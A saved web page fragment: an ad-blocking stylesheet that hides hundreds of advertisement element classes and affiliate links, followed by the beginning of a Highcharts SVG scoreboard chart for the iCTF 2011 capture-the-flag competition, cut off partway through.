00,.banner_300x250,.banner_728x90,.banner_ad,.banner_ad_footer,.banner_ad_leaderboard,.bannerad,.bannerad-125tower,.bannerad-468x60,.barkerAd,.base-ad-mpu,.base_ad,.base_printer_widgets_AdBreak,.bg-ad-link,.bgnavad,.big-ads,.bigAd,.big_ad,.big_ads,.bigad,.bigad2,.bigbox_ad,.bigboxad,.billboard300x250,.billboard_ad,.biz-ad,.biz-ads,.biz-adtext,.blk_advert,.block-ad,.block-ad300,.block-admanager,.block-ads-bottom,.block-ads-top,.block-adsense,.block-adsense-managed,.block-adspace-full,.block-bg-advertisement-region-1,.block-deca_advertising,.block-google-admanager,.block-google_admanager,.block-openads,.block-openadstream,.block-openx,.block-thirdage-ads,.block-wtg_adtech,.blockAd,.blockAds,.block_ad,.block_ad_floating_bar,.block_ad_sb_text,.block_ad_sb_text2,.block_ad_sponsored_links,.block_ad_sponsored_links-wrapper,.block_ad_sponsored_links_localized,.blockad,.blocked-ads,.blog-ad-leader-inner,.blog-ads-container,.blogAd,.blogAdvertisement,.blogArtAd,.blogBigAd,.blog_ad,.blogads,.blox3featuredAd,.bn_textads,.body_ad,.body_sponsoredresults_bottom,.body_sponsoredresults_middle,.body_sponsoredresults_top,.bodyads,.bodyads2,.bookseller-header-advt,.bottom-ad,.bottom-ad-fr,.bottom-ads,.bottomAd,.bottomAds,.bottom_ad,.bottom_ad_block,.bottom_ads,.bottom_adsense,.bottom_right_ad,.bottomad,.bottomads,.bottomadvert,.bottombarad,.bottomrightrailAd,.bottomvidad,.box-ad,.box-ad-grey,.box-ads,.box-ads-small,.box-adsense,.box-adverts,.boxAd,.boxAds,.boxAdsInclude,.box_ad,.box_ad_container,.box_ad_content,.box_ad_spacer,.box_ad_wrap,.box_ads,.box_adv,.box_adv_new,.box_advertising,.box_advertisment_62_border,.box_content_ad,.box_content_ads,.box_textads,.boxad,.boxads,.boxyads,.bps-ad-wrapper,.bps-advertisement,.bps-advertisement-inline-ads,.br-ad,.breakad_container,.brokerad,.bsa_ads,.btm_ad,.btm_ad_container,.btn-ad,.bullet-sponsored-links,.bullet-sponsored-links-gray,.burstContentAdIndex,.busrep_poll_and_ad_container,.buttonAd,.buttonAds,.button_ads,.button_advert,.buttonadbox,.buttonads,.bx_ad,.bx_ad_right,.cA-adStrap,.cColumn-TextAdsBox,.cLeftTextAdUnit,.c_ligatus_nxn,.calendarAd,.calloutAd,.carbonad,.carbonad-tag,.care2_adspace,.catalog_ads,.category-ad,.categorySponsorAd,.category__big_game_container_body_games_advertising,.cb-ad-banner,.cb-ad-container,.cb_ads,.cb_navigation_ad,.cbstv_ad_label,.cbzadvert,.cbzadvert_block,.cdAdTitle,.cdmainlineSearchAdParent,.cdo-ad-section,.cdsidebarSearchAdParent,.centerAd,.center_ad,.centerad,.centered-ad,.chitikaAdCopy,.cinemabotad,.classifiedAdThree,.clearerad,.cmAdContainer,.cmAdFind,.cmAdSponsoredLinksBox,.cm_ads,.cms-Advert,.cnbc_badge_banner_ad_area,.cnbc_banner_ad_area,.cnbc_leaderboard_ad,.cnn160AdFooter,.cnnAd,.cnnMosaic160Container,.cnnStoreAd,.cnnStoryElementBoxAd,.cnnWCAdBox,.cnnWireAdLtgBox,.cnn_728adbin,.cnn_adcntr300x100,.cnn_adcntr728x90,.cnn_adspc336cntr,.cnn_adtitle,.cntrad,.column2-ad,.columnBoxAd,.columnRightAdvert,.com-ad-server,.comment-ad,.comment-ad-wrap,.comment-advertisement,.comment_ad_box,.common_advertisement_title,.communityAd,.conTSponsored,.conductor_ad,.confirm_ad_left,.confirm_ad_right,.confirm_leader_ad,.consoleAd,.container-adwords,.containerSqAd,.container_serendipity_plugin_google_adsense,.content-ad,.content-ads,.content-advert,.contentAd,.contentAdContainer,.contentAdFoot,.contentAdsWrapper,.content_ad,.content_ad_728,.content_adsense,.content_adsq,.content_tagsAdTech,.contentad,.contentad-home,.contentad300x250,.contentad_right_col,.contentadcontainer,.contentadfloatl,.contentadleft,.contentads,.contentadstartpage,.contents-ads-bottom-left,.contenttextad,.contest_ad,.cp_ad,.cpmstarHeadline,.cpmstarText,.create_ad,.cs-mpu,.cscTextAd,.cse_ads,.cspAd,.ct_ad,.ctnAdSkyscraper,.ctnAdSquare300,.cube-ad,.cubeAd,.cube_ads,.currency_ad,.custom_ads,.cwAdvert,.cxAdvertisement,.darla_ad,.dart-ad,.dartAdImage,.dart_ad,.dart_tag,.dartadvert,.dartiframe,.dc-ad,.dcAdvertHeader,.deckAd,.deckads,.detail-ads,.detailMpu,.detail_ad,.detail_top_advert,.dfrads,.displayAdSlot,.divAd,.divAdright,.div_adv300,.div_advstrip,.divad1,.divad2,.divad3,.divads,.divider_ad,.dlSponsoredLinks,.dmco_advert_iabrighttitle,.downloadAds,.download_ad,.downloadad,.dsq_ad,.dualAds,.dynamic-ads,.dynamic_ad,.e-ad,.ec-ads,.ec-ads-remove-if-empty,.em-ad,.em_ads_box_dynamic_remove,.embed-ad,.embeddedAd,.entry-body-ad,.entry-injected-ad,.entry_sidebar_ads,.entryad,.ez-clientAd,.f_Ads,.feature_ad,.featuredAds,.featured_ad,.featuredadvertising,.fireplaceadleft,.fireplaceadright,.fireplaceadtop,.firstpost_advert_container,.flagads,.flash-advertisement,.flash_ad,.flash_advert,.flashad,.flexiad,.flipbook_v2_sponsor_ad,.floatad,.floated_right_ad,.floatingAds,.fm-badge-ad,.fns_td_wrap,.fold-ads,.footad,.footer-ad,.footer-advert,.footerAd,.footerAdModule,.footerAds,.footerAdslot,.footerAdverts,.footerTextAd,.footer_ad,.footer_ad336,.footer_ads,.footer_block_ad,.footer_bottomad,.footer_line_ad,.footer_text_ad,.footerad,.forumtopad,.freedownload_ads,.frn_adbox,.frn_cont_adbox,.frontads,.frontpage-google-ad,.ft-ad,.ftdAdBar,.ftdContentAd,.full_ad_box,.full_width_ad,.fullbannerad,.g3rtn-ad-site,.gAdRows,.gAdSky,.gAdvertising,.g_ggl_ad,.ga-ads,.ga-textads-bottom,.ga-textads-top,.gaTeaserAds,.gaTeaserAdsBox,.gads_cb,.gads_container,.gallery_ad,.gam_ad_slot,.gameAd,.gamesPage_ad_content,.gbl_advertisement,.gen_side_ad,.gglAds,.global_banner_ad,.googad,.googads,.google-ad,.google-ad-container,.google-ads,.google-ads-boxout,.google-ads-slim,.google-adsense,.google-right-ad,.google-sponsored-ads,.google-sponsored-link,.google468,.google468_60,.googleAd,.googleAd-content,.googleAd-list,.googleAd300x250_wrapper,.googleAdBox,.googleAdSense,.googleAdSenseModule,.googleAd_body,.googleAds,.googleAds_article_page_above_comments,.googleAdsense,.googleContentAds,.googleProfileAd,.googleSearchAd_content,.googleSearchAd_sidebar,.google_ad,.google_ad_wide,.google_add_container,.google_ads,.google_ads_bom_title,.google_ads_content,.google_adsense_footer,.googlead,.googleaddiv,.googleaddiv2,.googleads,.googleads_300x250,.googleads_title,.googleadsense,.googleafc,.googley_ads,.gpAdBox,.gpAds,.gradientAd,.grey-ad-line,.group_ad,.gsAd,.gsfAd,.gt_ad,.gt_ad_300x250,.gt_ad_728x90,.gt_adlabel,.gutter-ad-left,.gutter-ad-right,.gx_ad,.h-ad-728x90-bottom,.h_Ads,.h_ad,.half-ad,.half_ad_box,.hcf-ad,.hcf-ad-rectangle,.hcf-cms-ad,.hd_advert,.hdr-ads,.head_ad,.header-ad,.header-advert,.header-google-ads,.header-taxonomy-image-sponsor,.headerAd,.headerAdCode,.headerAds,.headerAdvert,.headerTextAd,.header_ad,.header_ad_center { display:none !important; } .header_ad_div,.header_ads,.header_advertisement,.header_advertisment,.headerad,.headerad-720,.hi5-ad,.highlightsAd,.hm_advertisment,.hn-ads,.home-ad-links,.homeAd,.homeAd1,.homeAd2,.homeAdBoxA,.homeAdBoxBetweenBlocks,.homeAdBoxInBignews,.homeAdSection,.homeMediumAdGroup,.home_ad_bottom,.home_advertisement,.home_advertorial,.home_mrec_ad,.homead,.homepage-ad,.homepage300ad,.homepageFlexAdOuter,.homepageMPU,.homepage_middle_right_ad,.homepageinline_adverts,.hor_ad,.horiz_adspace,.horizontalAd,.horizontal_ad,.horizontal_ads,.horizontaltextadbox,.horizsponsoredlinks,.hortad,.houseAd1,.houseAdsStyle,.housead,.hoverad,.hp-col4-ads,.hp2-adtag,.hp_ad_cont,.hp_ad_text,.hp_t_ad,.hp_w_ad,.hpa-ad1,.html-advertisement,.ic-ads,.ico-adv,.idMultiAd,.iframe-ad,.image-advertisement,.imageAd,.imageads,.imgad,.in-page-ad,.in-story-ads,.in-story-text-ad,.inStoryAd-news2,.indEntrySquareAd,.indie-sidead,.indy_googleads,.infoBoxThreadPageRankAds,.inhousead,.inline-ad,.inline-mpu,.inline-mpu-left,.inlineSideAd,.inline_ad,.inline_ad_title,.inlinead,.inlineadsense,.inlineadtitle,.inlist-ad,.inlistAd,.inner-advt-banner-3,.innerAds,.innerad,.inpostad,.insert_advertisement,.insertad,.insideStoryAd,.inteliusAd_image,.interest-based-ad,.internalAdsContainer,.iprom-ad,.is24-adplace,.isAd,.islandAd,.islandAdvert,.islandad,.itemAdvertise,.jimdoAdDisclaimer,.jp-advertisment-promotional,.js-advert,.kdads-empty,.kdads-link,.kw_advert,.kw_advert_pair,.l_ad_sub,.label-ad,.labelads,.largeRecAdNewsContainerRight,.largeRectangleAd,.largeUnitAd,.large_ad,.lastRowAd,.lazyload_ad,.lcontentbox_ad,.leadAd,.leaderAdSlot,.leaderAdTop,.leaderAdvert,.leaderBoardAdHolder,.leaderOverallAdArea,.leader_ad,.leaderboardAd,.leaderboardAdContainer,.leaderboardAdContainerInner,.leaderboard_ad,.leaderboardad,.leaderboardadtop,.left-ad,.left-advert,.leftAd,.leftAdColumn,.leftAds,.left_ad,.left_ad_box,.left_adlink,.left_ads,.left_adsense,.leftad,.leftadtag,.leftbar_ad_160_600,.leftbarads,.leftbottomads,.leftnavad,.lgRecAd,.lg_ad,.ligatus,.linead,.link_adslider,.link_advertise,.live-search-list-ad-container,.livingsocial-ad,.ljad,.local-ads,.log_ads,.logoAds,.logoad,.logoutAd,.longAd,.longAdBox,.lowerAds,.lr-ad,.m-ad-tvguide-box,.m4-adsbygoogle,.m_banner_ads,.macAd,.macad,.main-ad,.main-advert,.main-tabs-ad-block,.mainAd,.mainLeftAd,.mainLinkAd,.mainRightAd,.main_ad,.main_ad_bg_div,.main_adbox,.main_ads,.main_intro_ad,.map_media_banner_ad,.marginadsthin,.marketing-ad,.masthead_topad,.matador_sidebar_ad_600,.mdl-ad,.media-advert,.mediaAd,.mediaAdContainer,.mediaResult_sponsoredSearch,.medium-rectangle-ad,.mediumRectangleAdvert,.medium_ad,.medrect_ad,.member-ads,.menuItemBannerAd,.menueadimg,.messageBoardAd,.mf-ad300-container,.micro_ad,.mid_ad,.mid_page_ad,.midad,.middle-ad,.middleAds,.middlead,.middleads,.min_navi_ad,.mini-ad,.miniad,.miscAd,.mmc-ad,.mmcAd_Iframe,.mod-ad-lrec,.mod-ad-n,.mod-adopenx,.mod-vertical-ad,.mod_admodule,.module-ad,.module-ad-small,.module-ads,.module-advertisement,.module-sponsored-ads,.moduleAd,.moduleAdvertContent,.module_ad,.module_box_ad,.modulegad,.moduletable-advert,.moduletable-googleads,.moduletablesquaread,.mos-ad,.mpu-ad,.mpu-ad-con,.mpu-advert,.mpu-footer,.mpu-fp,.mpu-title,.mpu-top-left,.mpu-top-left-banner,.mpu-top-right,.mpu01,.mpuAd,.mpuAdSlot,.mpuAdvert,.mpuArea,.mpuBox,.mpuContainer,.mpuHolder,.mpuTextAd,.mpu_ad,.mpu_advert,.mpu_container,.mpu_gold,.mpu_holder,.mpu_platinum,.mpu_side,.mpu_text_ad,.mpuad,.mpuholderportalpage,.mrec_advert,.ms-ads-link,.msfg-shopping-mpu,.mvw_onPageAd1,.mwaads,.my-ad250x300,.nSponsoredLcContent,.nSponsoredLcTopic,.nadvt300,.narrow_ad_unit,.narrow_ads,.navAdsBanner,.navBads,.nav_ad,.navadbox,.navcommercial,.navi_ad300,.naviad,.nba300Ad,.nbaT3Ad160,.nbaTVPodAd,.nbaTwo130Ads,.nbc_ad_carousel_wrp,.newPex_forumads,.newTopAdContainer,.newad,.newsAd,.news_article_ad_google,.newsviewAdBoxInNews,.newsvinemsn_adtype,.nexusad,.nf-adbox,.nn-mpu,.noAdForLead,.normalAds,.nrAds,.nsAdRow,.nu2ad,.oas-ad,.oas-bottom-ads,.oas_ad,.oas_advertisement,.offer_sponsoredlinks,.oio-banner-zone,.oio-link-sidebar,.oio-zone-position,.on_single_ad_box,.onethirdadholder,.openads,.openadstext_after,.openx,.openx-ad,.openx_ad,.osan-ads,.other_adv2,.outermainadtd1,.ovAdPromo,.ovAdSky,.ovAdartikel,.ov_spns,.ovadsenselabel,.pageAds,.pageBottomGoogleAd,.pageGoogleAd,.pageGoogleAdFlat,.pageGoogleAdSubcontent,.pageGoogleAds,.pageGoogleAdsContainer,.pageLeaderAd,.page_content_right_ad,.pagead,.pageads,.pagenavindexcontentad,.paneladvert,.partner-ad,.partner-ads-container,.partnerAd,.partnersTextLinks,.pencil_ad,.player_ad_box,.player_hover_ad,.player_page_ad_box,.plista_inimg_box,.pm-ad,.pmad-in2,.pnp_ad,.pod-ad-300,.podRelatedAdLinksWidget,.podSponsoredLink,.portalCenterContentAdBottom,.portalCenterContentAdMiddle,.portalCenterContentAdTop,.portal_searchresultssponsoredlist,.portalcontentad,.post-ad,.postAd,.post_ad,.post_ads,.post_sponsor_unit,.postbit_adbit_register,.postbit_adcode,.postgroup-ads,.postgroup-ads-middle,.prebodyads,.premium_ad_container,.promoAd,.promoAds,.promo_ad,.promoboxAd,.promotionTextAd,.ps-ligatus_placeholder,.pub_300x250,.pub_300x250m,.pub_728x90,.publication-ad,.publicidad,.puff-advertorials,.qa_ad_left,.qm-ad-content,.qm-ad-content-news,.quigo-ad,.qzvAdDiv,.r_ad_1,.r_ad_box,.r_ads,.rad_container,.rect_ad_module,.rectad,.rectangle-ad,.rectangleAd,.rectanglead,.redads_cont,.referrerDetailAd,.regular_728_ad,.regularad,.relatedAds,.related_post_google_ad,.relatesearchad,.remads,.resourceImagetAd,.result_ad,.reviewMidAdvertAlign,.rght300x250,.rhads,.rhs-ad,.rhs-ads-panel,.rhs-advert-container,.rhs-advert-link,.rhs-advert-title,.right-ad,.right-ad-holder,.right-ad2,.right-ads,.right-ads2,.right-sidebar-box-ad,.rightAd,.rightAdBox,.rightAdverts,.rightColAd,.rightColumnRectAd,.rightRailAd,.right_ad,.right_ad_160,.right_ad_box,.right_ad_common_block,.right_ad_text,.right_ad_top,.right_ads,.right_ads_column,.right_box_ad_rotating_container,.right_col_ad,.right_hand_advert_column,.right_side-partyad,.rightad,.rightad_1,.rightad_2,.rightadbox1,.rightads,.rightadunit,.rightbigcolumn_ads,.rightbigcolumn_ads_nobackground,.rightcol_boxad,.rightcoladvert,.rightcoltowerad,.rightmenu_ad,.rnav_ad,.rngtAd,.rot_ads,.round_box_advert,.roundedCornersAd,.roundingrayboxads,.rt_ad1_300x90,.rt_ad_300x250,.rt_ad_call,.s2k_ad,.savvyad_unit,.sb-ad-sq-bg,.sbAd,.sbAdUnitContainer,.sb_ad_holder,.sb_adsN,.sb_adsNv2,.sb_adsW,.sb_adsWv2,.scanAd,.scc_advert,.sci-ad-main,.sci-ad-sub,.search-ad,.search-results-ad,.search-sponsor,.search-sponsored,.searchAd,.searchAdTop,.searchAds,.searchSponsoredResultsBox,.searchSponsoredResultsList,.search_column_results_sponsored,.search_results_sponsored_top,.section-ad2,.section_mpu_wrapper,.section_mpu_wrapper_wrapper,.selfServeAds,.sepContentAd,.serp_sponsored,.servsponserLinks,.shoppingGoogleAdSense,.showAd_No,.showAd_Yes,.showcaseAd,.sidbaread,.side-ad,.side-ads,.side-sky-banner-160,.sideAd,.sideBoxAd,.side_ad,.side_ad2,.side_ad_1,.side_ad_2,.side_ad_3,.sidead,.sideads,.sideadsbox,.sideadvert,.sidebar-ad,.sidebar-ads,.sidebar-content-ad,.sidebar-text-ad,.sidebarAd,.sidebarAdUnit,.sidebarAdvert,.sidebar_ad,.sidebar_ad_300_250,.sidebar_ads,.sidebar_ads_336,.sidebar_adsense,.sidebar_box_ad,.sidebarad,.sidebarad_bottom,.sidebaradbox,.sidebarads,.sidebarboxad,.sideheadnarrowad,.sideheadsponsorsad,.simple_ads_manager_widget,.single-google-ad,.singleAd,.singleAdsContainer,.single_ad,.singlead,.singleadstopcstm2,.site_ad_120_600,.site_ad_300x250,.sitesponsor,.skinAd,.skin_ad_638,.sky-ad,.skyAd,.skyAdd,.skyAdvert,.skyAdvert2,.sky_ad,.sky_scraper_ad,.skyad,.skyjobsadtext,.skyscraper-ad,.skyscraper_ad,.skyscraper_bannerAdHome,.sleekadbubble,.slideshow-ad,.slpBigSlimAdUnit,.slpSquareAdUnit,.sm_ad,.smallSkyAd1,.smallSkyAd2,.small_ad,.small_ads,.smallad-left,.smallads,.smallsponsorad,.smart_ads_bom_title,.spLinks,.specialAd175x90,.speedyads,.sphereAdContainer,.spl-ads,.spl_ad,.spl_ad2,.spl_ad_plus,.splitAd,.splitAdResultsPane,.sponlinkbox,.spons-link,.spons_links,.sponslink,.sponsor-ad,.sponsor-link,.sponsor-links,.sponsor-services,.sponsorPanel,.sponsorPost,.sponsorPostWrap,.sponsorStrip,.sponsor_ad_area,.sponsor_area,.sponsor_bar,.sponsor_columns,.sponsor_footer,.sponsor_line,.sponsor_links,.sponsor_logo,.sponsoradtitle,.sponsored-ads,.sponsored-chunk,.sponsored-editorial,.sponsored-features,.sponsored-links,.sponsored-links-alt-b,.sponsored-links-holder,.sponsored-links-right,.sponsored-post,.sponsored-post_ad,.sponsored-results,.sponsored-right-border,.sponsored-text,.sponsoredBox,.sponsoredInfo,.sponsoredInner,.sponsoredLabel,.sponsoredLink,.sponsoredLinks,.sponsoredLinks2,.sponsoredLinksHeader,.sponsoredProduct,.sponsoredResults,.sponsoredSideInner,.sponsored_ads,.sponsored_box,.sponsored_box_search,.sponsored_by,.sponsored_link,.sponsored_links,.sponsored_links_title_container,.sponsored_links_title_container_top,.sponsored_links_top,.sponsored_result,.sponsored_results,.sponsored_ss,.sponsored_well,.sponsoredibbox,.sponsoredlink,.sponsoredlinks,.sponsoredlinkscontainer,.sponsoredresults,.sponsoredtextlink_container_ovt,.sponsoring_link,.sponsorlink,.sponsorlink2,.sponsormsg,.sport-mpu-box,.spotlightAd,.squareAd,.square_ad,.square_banner_ad,.squared_ad,.ss-ad-banner,.ss-ad-mpu,.standard-ad,.start__newest__big_game_container_body_games_advertising,.staticAd,.stickyAdLink,.stock-ticker-ad-tag,.stocks-ad-tag,.store-ads,.story_AD,.story_ad_div,.story_right_adv,.storyad,.subad,.subadimg,.subcontent-ad,.subtitle-ad-container,.sugarad,.super-ad,.supercommentad_left,.supercommentad_right,.supp-ads,.supportAdItem,.surveyad,.t10ad,.tab_ad,.tab_ad_area,.tablebordersponsor,.tadsanzeige,.tadsbanner,.tadselement,.tallad,.tblTopAds,.tbl_ad,.tbox_ad,.td-Adholder,.td-TrafficWeatherWidgetAdGreyBrd,.teaser-sponsor,.teaserAdContainer,.teaser_adtiles,.teaser_advert_content,.text-ad,.text-ad-links,.text-ads,.text-advertisement,.text-g-advertisement,.text-g-group-short-rec-ad,.text-g-net-grp-google-ads-article-page,.textAd,.textAdBox,.textAds,.text_ad,.text_ads,.textad,.textadContainer,.textad_headline,.textadbox,.textadheadline,.textadlink,.textads,.textads_left,.textads_right,.textadsds,.textadsfoot,.textadtext,.textadtxt,.textadtxt2,.textlink-ads,.textlinkads,.tf_page_ad_search,.thirdage_ads_300x250,.thirdage_ads_728x90,.thisIsAd,.thisIsAnAd,.ticket-ad,.tileAds,.tips_advertisement,.title-ad,.title_adbig,.tncms-region-ads,.toolad,.toolbar-ad,.top-ad,.top-ad-space,.top-ads,.top-banner-ad,.top-left-nav-ad,.top-menu-ads,.topAd,.topAdWrap,.topAds,.topAdvertisement,.topAdverts,.topBannerAd,.topLeaderboardAd,.top_Ad,.top_ad,.top_ad1,.top_ad_728,.top_ad_728_90,.top_ad_disclaimer,.top_ad_div,.top_ad_post,.top_ad_wrapper,.top_ads,.top_advert,.top_advertisement,.top_advertising_lb,.top_bar_ad,.top_container_ad,.topad,.topad-bar,.topadbox,.topads,.topadspot,.topadvertisementsegment,.topboardads,.topcontentadvertisement,.topic_inad,.topstoriesad,.toptenAdBoxA,.tourFeatureAd,.tower-ad,.towerAd,.towerAdLeft,.towerAds,.tower_ad,.tower_ad_disclaimer,.towerad,.tr-ad-adtech-placement,.tribal-ad,.ts-ad_unit_bigbox,.ts-banner_ad,.ttlAdsensel,.tto-sponsored-element,.tucadtext,.tvs-mpu,.twoColumnAd,.twoadcoll,.twoadcolr,.tx_smartadserver_pi1,.txt-ads,.txtAd,.txtAds,.txt_ads,.txtadvertise,.type_adscontainer,.type_miniad,.type_promoads,.ukAds,.ukn-banner-ads,.under_ads,.undertimyads,.unit-ad,.universalboxADVBOX01,.universalboxADVBOX03,.universalboxADVBOX04a,.usenext,.v5rc_336x280ad,.vert-ads,.vert-adsBlock,.vertad,.vertical-adsense,.vidadtext,.videoAd,.videoBoxAd,.video_ad,.view-promo-mpu-right,.view_rig_ad,.virgin-mpu,.wa_adsbottom,.wantads,.weather_ad,.webads336x280,.wide-ad,.wide-advert,.wide-skyscraper-ad,.wideAd,.wideAdTable,.wide_ad,.wide_ad_unit_top,.wide_ads,.wide_google_ads,.widget-ad,.widget-ad-codes,.widget-ad300x250,.widget-entry-ads-160,.widgetYahooAds,.widget_ad,.widget_ad_boxes_widget,.widget_ad_rotator,.widget_adrotate_widgets,.widget_advert_widget,.widget_econaabachoadswidget,.widget_island_ad,.widget_maxbannerads,.widget_sdac_bottom_ad_widget,.widget_sdac_footer_ads_widget,.widget_sdac_skyscraper_ad_widget,.wikia-ad,.wikia_ad_placeholder,.wingadblock,.withAds,.wl-ad,.wnMultiAd,.wp125_write_ads_widget,.wp125ad,.wp125ad_2,.wpn_ad_content,.wrap-ads,.wrapper-ad,.wrapper-ad-sidecol,.wsSponsoredLinksRight,.wsTopSposoredLinks,.x03-adunit,.x04-adunit,.x81_ad_detail,.xads-blk-top-hld,.xads-blk2,.xads-ojedn,.y-ads,.y-ads-wide,.y7-advertisement,.yahoo-sponsored,.yahoo-sponsored-links,.yahooAd,.yahooAds,.yahoo_ads,.yahooad,.yahooad-image,.yahooad-urlline,.yan-sponsored,.ygrp-ad,.yom-ad,.youradhere,.yrail_ad_wrap,.yrail_ads,.ysmsponsor,.ysponsor,.yw-ad,.zRightAdNote,a[href*="/adrotate/adrotate-out.php?"],a[href^="http://ad-apac.doubleclick.net/"],a[href^="http://ad-emea.doubleclick.net/"],a[href^="http://ad.doubleclick.net/"],a[href^="http://ads.pheedo.com/"],a[href^="http://adserving.liveuniversenetwork.com/"],a[href^="http://api.ringtonematcher.com/"],a[href^="http://galleries.pinballpublishernetwork.com/"],a[href^="http://galleries.securewebsiteaccess.com/"],a[href^="http://install.securewebsiteaccess.com/"],a[href^="http://latestdownloads.net/download.php?"],a[href^="http://secure.signup-page.com/"],a[href^="http://secure.signup-way.com/"],a[href^="http://www.FriendlyDuck.com/AF_"],a[href^="http://www.adbrite.com/mb/commerce/purchase_form.php?"],a[href^="http://www.firstload.de/affiliate/"],a[href^="http://www.friendlyduck.com/AF_"],a[href^="http://www.google.com/aclk?"],a[href^="http://www.liutilities.com/aff"],a[href^="http://www.liutilities.com/products/campaigns/adv/"],a[href^="http://www.my-dirty-hobby.com/?sub="],a[href^="http://www.ringtonematcher.com/"],#mbEnd[cellspacing="0"][cellpadding="0"],#mclip_container:last-child,#ssmiwdiv[jsdisplay],#tads.c,#tadsb.c,#tadsto.c,.ch[onclick="ga(this,event)"],.ra[align="left"][width="30%"],.ra[align="right"][width="30%"],div[style="background:#fbf0fa;margin:0 0 14px;min-height:0;padding-top:2px;padding-bottom:1px;padding-right:8px;padding-left:7px"],#WerbungObenRechts10_GesamtDIV,#WerbungObenRechts8_GesamtDIV,#WerbungObenRechts9_GesamtDIV,#WerbungUntenLinks4_GesamtDIV,#WerbungUntenLinks7_GesamtDIV,#WerbungUntenLinks8_GesamtDIV,#WerbungUntenLinks9_GesamtDIV,#Werbung_Content,#Werbung_Sky,#Werbung_Wide,#__ligatus_placeholder__,#ad-bereich1-08,#ad-bereich1-superbanner,#ad-bereich2-08,#ad-bereich2-skyscrapper,#ad-rechts-block,#ad-rechts-sky,#ad_gross,#ad_lang,#ad_oben,#ad_rechts,#adbox_artikel,#adkontainer,#anzeigewerbungtext,#ar_detail_werb103,#bannerwerbung,#callya_freikarte_layer,#cnt_bgwerbung,#cont-werb,#forumformwerbung,#freikarte_layer,#gonamicerror,#header_werbung,#headerwerbung,#kaufDA,#kaufDA-widget-container,#kopf-werbung,#lieferando-widget-container,#moveable_werbung,#p-links-werbung,#p-rechts-werbung,#qm_content_ad_anzeige,#reklame,#startwerbung,#t_werbung,#textwerbung,#topwerbung,#werbLayer1,#werbLayer2,#werbLayer3,#werb_ps103,#werbeadd,#werbebalken_slot,#werbebanner,#werbeblock,#werbebox,#werbebox_contentad,#werbecontainer_content,#werbecontainer_sky,#werbeflaeche,#werbetrenner,#werbung,#werbung-left,#werbung-skyscraper,#werbung1,#werbung2,#werbung3,#werbung792_2,#werbungSuperbanner,#werbung_bigsize,#werbung_footer,#werbung_mitte,#werbung_rechts,#werbung_right,#werbung_top,#werbunglink,#werbungrechts,#werbungsky,#wkr_werbung,.Artikel_Ads_News,.KomischeWerbeBox,.RessortWerbungHeader,.Werbeteaser,.Werbung,.WerbungAdpepper { display:none !important; } .WerbungDetailRectangle,.WerbungLinksRechts,.WerbungMitte,.ad_mitte,.ads_rechts,.adzeiger,.anzeigenwerbung,.bannerAnzeige,.bdeFotoGalAd,.bdeFotoGalAdText,.big-werb,.block_rs4_werbung,.bottom-werbung-box,.box_werbung_detailseite,.boxstartwerbung,.boxwerb,.boxwerbung,.content_body_right_werbung,.content_header_werbung,.content_right_side_werbewrapper,.contentwerbung4,.ecom_werbung,.firstload,.fullbanner_werbung,.gutZuWissenAd,.insidewerbung,.lokalwerbung,.rahmen_ad,.reklame,.right-content-werbung,.seitenleiste_werbung,.sponsorinaktiv,.sponsorlinkgruen,.tab_artikelwerbung,.teaser_adliste,.text_werbung,.textad_hauptlink,.topwerbung,.werbeadd_ueber,.werbebanner,.werbeflaeche,.werbung,.werbung-bigbox,.werbung-bigsize,.werbung-content,.werbung-contentad,.werbung-fullbanner,.werbung-halfbanner,.werbung-label,.werbung-leiste,.werbung-rectangle,.werbung-skyscraper,.werbung-skyscraper2,.werbung1,.werbung2,.werbung3,.werbung300,.werbung301,.werbungAnzeige,.werbungTabelle,.werbung_bereich,.werbungamazon,a[href^="http://farm.plista.com/pets"],a[href^="http://shortnews.de/gotoklick.cfm?fr_campaign_adtext_id="],a[href^="http://www.eis.de/index.phtml?refid="],a[href^="http://www.firstload.de/index.php?set_lang=de&log="],a[href^="http://www.top-of-software.de/"],a[href^="https://farm.plista.com/pets"],input[onclick^="window.open('http://www.firstload.de/affiliate/"] { display:none !important; }</style> + +<body> +<div id="container" style="width: 100%; height: 100%; margin: 0 auto"><div class="highcharts-container" id="highcharts-1575" style="position: relative; overflow-x: hidden; overflow-y: hidden; width: 688px; height: 400px; text-align: left; font-family: 'Lucida Grande', 'Lucida Sans Unicode', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; "><svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="688" height="400"><defs><lineargradient id="highcharts-1576" gradientUnits="userSpaceOnUse" x1="0" y1="0" x2="0" y2="50"><stop offset="0" stop-color="rgb(96,96,96)" stop-opacity="0.8"></stop><stop offset="1" stop-color="rgb(16,16,16)" stop-opacity="0.8"></stop></lineargradient><lineargradient id="highcharts-1577" gradientUnits="userSpaceOnUse" x1="0" y1="0" x2="0" y2="400"><stop offset="0" stop-color="rgb(62,84,130)" stop-opacity="1"></stop><stop offset="1" stop-color="rgb(16, 16, 20)" stop-opacity="1"></stop></lineargradient><lineargradient id="highcharts-1578" gradientUnits="userSpaceOnUse" x1="0" y1="0" x2="0" y2="20"><stop offset="0.4" stop-color="#606060" stop-opacity="1"></stop><stop offset="0.6" stop-color="#333333" stop-opacity="1"></stop></lineargradient><lineargradient id="highcharts-1579" gradientUnits="userSpaceOnUse" x1="0" y1="0" x2="0" y2="20"><stop offset="0.4" stop-color="#606060" stop-opacity="1"></stop><stop offset="0.6" stop-color="#333333" stop-opacity="1"></stop></lineargradient><clippath id="highcharts-1580"><rect rx="0" ry="0" fill="none" x="0" y="0" width="399" height="296" stroke-width="0.000001"></rect></clippath></defs><rect rx="15" ry="15" fill="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1577)" x="0" y="0" width="688" height="400" stroke-width="0.000001" stroke="#4572A7"></rect><text x="324" y="25" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:16px;color:#FFF;font:16px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif;fill:#FFF;" text-anchor="middle" class="highcharts-title" zIndex="1"><tspan x="324">iCTF 2011 Score</tspan></text><text x="324" y="40" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;color:#DDD;font:12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif;fill:#DDD;" text-anchor="middle" class="highcharts-subtitle" zIndex="1"><tspan x="324">http://ictf2011.info</tspan></text><g class="highcharts-grid" zIndex="1"></g><g class="highcharts-grid" zIndex="1"><path d="M 75 